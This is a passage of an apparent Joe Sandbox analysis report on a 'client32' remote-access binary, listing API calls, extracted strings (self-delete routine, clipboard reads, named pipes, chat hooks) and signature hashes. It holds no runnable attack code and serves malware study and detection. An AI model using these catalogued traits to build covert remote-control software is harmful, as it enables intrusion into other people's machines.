                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                                        • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                                        • API String ID: 2219718054-800295887
                                                                                        • Opcode ID: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                        • Instruction ID: 6f5bf149a73cded94bd2a3d0400a9449b47971ff92e0dc1769d6f3c3ef99b26f
                                                                                        • Opcode Fuzzy Hash: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                        • Instruction Fuzzy Hash: D8B1D4B5A40328AFE724DF60CD85FDAF7B8EB44708F008199E619A76C4DB706A84CF55
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(000007D0,?,?,?,?,00000003), ref: 1102DAA8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: *.*$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Finished terminate$HookDirectSound$Stop tracing, almost terminated$Unload Hook$pSlash
                                                                                        • API String ID: 3472027048-4043340749
                                                                                        • Opcode ID: d0826688aa333f0d06d15d34ec1d8fe2eb0dac57578937a67a689c38747e6abe
                                                                                        • Instruction ID: d56efc98ad72941ff424cdc5152fef311379b6c09b9f264f80b34d0be5964fb8
                                                                                        • Opcode Fuzzy Hash: d0826688aa333f0d06d15d34ec1d8fe2eb0dac57578937a67a689c38747e6abe
                                                                                        • Instruction Fuzzy Hash: 3EA1F274E426269FEB06DFE0CCC4F6DB7A5AB8470CF6001B8E62657288D7716D84CB52
                                                                                        APIs
                                                                                        • IsWindow.USER32(?), ref: 1105190A
                                                                                        • GetDlgItem.USER32(?,00000454), ref: 11051997
                                                                                        • SendMessageA.USER32(?,00000180,00000000,?,?,00000000), ref: 110519F9
                                                                                        • SendMessageA.USER32(?,0000019A,00000000,?), ref: 11051A12
                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 11051B49
                                                                                          • Part of subcall function 11001E20: SetFocus.USER32 ref: 11001E28
                                                                                          • Part of subcall function 111325F0: ShowWindow.USER32(?,1103936E), ref: 11132603
                                                                                          • Part of subcall function 111325F0: SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1113261F
                                                                                          • Part of subcall function 11024880: _memset.LIBCMT ref: 110248A5
                                                                                          • Part of subcall function 11024880: _strncpy.LIBCMT ref: 110248B1
                                                                                          • Part of subcall function 11024880: _memset.LIBCMT ref: 1102492E
                                                                                          • Part of subcall function 11024880: _strncpy.LIBCMT ref: 1102493A
                                                                                          • Part of subcall function 11024880: IsWindow.USER32(00000000), ref: 1102494D
                                                                                          • Part of subcall function 11024880: IsIconic.USER32(00000000), ref: 1102496B
                                                                                          • Part of subcall function 11024880: BringWindowToTop.USER32(00000000), ref: 11024988
                                                                                          • Part of subcall function 11021E80: _memmove.LIBCMT ref: 11021EDE
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 11051ED2
                                                                                          • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,750A94D8), ref: 11145CA0
                                                                                          • Part of subcall function 11145C70: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                          • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                          • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                        • _memset.LIBCMT ref: 1105221B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$_memset$_strncpy$EnableMessageSend$BringFocusIconicItemOpenShowVersion_memmove
                                                                                        • String ID: 506013$AlwaysOnTop$Chat$Client$JoinChat$RDH::CHATEX_CLOSE received$RDH::CHATEX_INVITE received - whiteboard %x$RDH::Create whiteboard object %x, ref count %d$RDH::Release whiteboard ref$WhiteBoard
                                                                                        • API String ID: 2416290131-1277300478
                                                                                        • Opcode ID: 8d45e78a12a00c5eb022a385543f1e462f7b533d682a6943ba6d22e42b588453
                                                                                        • Instruction ID: c08e69c62f27a2e742a48651e5aa9dbe60515c480b2091c2b2c36c4b254f8a5c
                                                                                        • Opcode Fuzzy Hash: 8d45e78a12a00c5eb022a385543f1e462f7b533d682a6943ba6d22e42b588453
                                                                                        • Instruction Fuzzy Hash: 6852C579E00705AFE790DFA4CC88B9AB7F5AF44708F1045A8E95A9B281DB74F940CF51
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 11123836
                                                                                        • FreeLibrary.KERNEL32(?,?,?), ref: 1112387B
                                                                                        • IsIconic.USER32(?), ref: 111238C4
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 11123931
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Iconic$FreeInvalidateLibraryRect
                                                                                        • String ID: KeepAspect$ScaleToFit$View$ignoring WM_TOUCH
                                                                                        • API String ID: 2857465220-3401310001
                                                                                        • Opcode ID: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                                        • Instruction ID: 49527fdfa53e08aa09f3a132f4721a51d3eab46a8aa9ea1429b3fa51c4cb3807
                                                                                        • Opcode Fuzzy Hash: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                                        • Instruction Fuzzy Hash: 30C12771E1870A9FEB15CF64CA81BEAF7A4FB4C714FA0052EE916872C0E775A841CB51
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 110CB7D9
                                                                                        • IsIconic.USER32(00000001), ref: 110CB7E9
                                                                                        • GetClientRect.USER32(00000001,?,?,?), ref: 110CB7F8
                                                                                        • GetSystemMetrics.USER32(00000000,?,?), ref: 110CB80D
                                                                                        • GetSystemMetrics.USER32(00000001,?,?), ref: 110CB814
                                                                                        • IsIconic.USER32(00000001), ref: 110CB844
                                                                                        • GetWindowRect.USER32(00000001,?), ref: 110CB853
                                                                                        • SetWindowPos.USER32(?,00000000,?,11186ABB,00000000,00000000,0000001D), ref: 110CB907
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                                        • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                        • API String ID: 2655531791-1552842965
                                                                                        • Opcode ID: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                                        • Instruction ID: bec57f5bcccff08dda3657368f880f3a53371a65c549dad109d34ac0d6980115
                                                                                        • Opcode Fuzzy Hash: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                                        • Instruction Fuzzy Hash: 3B51BE71E0061AAFDB10CFA5CC84FEEB7B8FB48754F1441A9E516A7280E774A905CF90
                                                                                        APIs
                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F886
                                                                                        • RemovePropA.USER32(?), ref: 1115F8A5
                                                                                        • RemovePropA.USER32(?), ref: 1115F8B4
                                                                                        • RemovePropA.USER32(?,00000000), ref: 1115F8C3
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        • CallWindowProcA.USER32(?,?,?,?,?), ref: 1115FC59
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
                                                                                        • String ID: ..\ctl32\wndclass.cpp$old_wndproc$qu
                                                                                        • API String ID: 1777853711-1160559903
                                                                                        • Opcode ID: d15fbf1ee6f48fdfeb5a3f8b4ce6e4d3d5fcee809489cf716bc2b57072c05fa9
                                                                                        • Instruction ID: 2a1ce18ce9ffe677ff7d10ad8131c1a7db68a641085b95e9de3494b6caebac20
                                                                                        • Opcode Fuzzy Hash: d15fbf1ee6f48fdfeb5a3f8b4ce6e4d3d5fcee809489cf716bc2b57072c05fa9
                                                                                        • Instruction Fuzzy Hash: 39D18E7530411A9BD748CE69E894EBBB3EAEBC9310B10466EFD56C3781DA31AC1187B1
                                                                                        APIs
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F37AC
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F37D5
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F37E2
                                                                                        • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3813
                                                                                        • GetLastError.KERNEL32 ref: 110F3820
                                                                                        • Sleep.KERNEL32(000003E8), ref: 110F383F
                                                                                        • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F385E
                                                                                        • LocalFree.KERNEL32(?), ref: 110F386F
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • pSD, xrefs: 110F37C5
                                                                                        • e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F37C0
                                                                                        • CreateNamedPipe %s failed, error %d, xrefs: 110F3828
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
                                                                                        • String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
                                                                                        • API String ID: 3134831419-838605531
                                                                                        • Opcode ID: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                                        • Instruction ID: 0e8d2fcc7f1c5a3ddbef900f79df2a7d8f3873558929e31ad043a2fe9730b339
                                                                                        • Opcode Fuzzy Hash: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                                        • Instruction Fuzzy Hash: D721AA71E80329BBE7119BA4CC8AFEEB76CDB44729F004211FE356B1C0D6B05A058795
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                        • API String ID: 0-293745777
                                                                                        • Opcode ID: 9536a60b758250b3cbeb57692f02060c19a68f93a4214de302fa188a7fb51758
                                                                                        • Instruction ID: 04be3a73864f79ea4ff0060164bd048450722a5e4ebb998c6abac99bf16b3135
                                                                                        • Opcode Fuzzy Hash: 9536a60b758250b3cbeb57692f02060c19a68f93a4214de302fa188a7fb51758
                                                                                        • Instruction Fuzzy Hash: FFA1B43AF142059FD714DB65DC91FAAF3A4EF98305F104199EA8A9B380DB71B901CB91
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 110934A9
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
                                                                                        • FindWindowA.USER32 ref: 110934EA
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 110934F1
                                                                                          • Part of subcall function 11091920: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091982
                                                                                          • Part of subcall function 11093410: GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                          • Part of subcall function 11091A50: CreateWindowExA.USER32 ref: 11091A9D
                                                                                          • Part of subcall function 11091A50: UpdateWindow.USER32 ref: 11091AEF
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531
                                                                                          • Part of subcall function 11091B00: GetMessageA.USER32 ref: 11091B1A
                                                                                          • Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
                                                                                          • Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
                                                                                          • Part of subcall function 11091B00: DispatchMessageA.USER32(?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B5B
                                                                                          • Part of subcall function 11091B00: GetMessageA.USER32 ref: 11091B6B
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 11093555
                                                                                          • Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32(00000000), ref: 110919FE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                        • String ID: NSMClassList$NSMFindClassEvent
                                                                                        • API String ID: 1622498684-2883797795
                                                                                        • Opcode ID: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
                                                                                        • Instruction ID: 4b33314c0ec69eaaabe86fb2bb0f057967e6cef17922574bfca5772aa51aa607
                                                                                        • Opcode Fuzzy Hash: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
                                                                                        • Instruction Fuzzy Hash: E911C639F4822D67EB15A3F51D29B9FBA985B44BA8F010024F92DDA580EF64F400E6A5
                                                                                        APIs
                                                                                        • IsClipboardFormatAvailable.USER32(?), ref: 11033361
                                                                                        • GetClipboardData.USER32 ref: 1103337D
                                                                                        • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
                                                                                        • GetLastError.KERNEL32 ref: 11033406
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 11033426
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
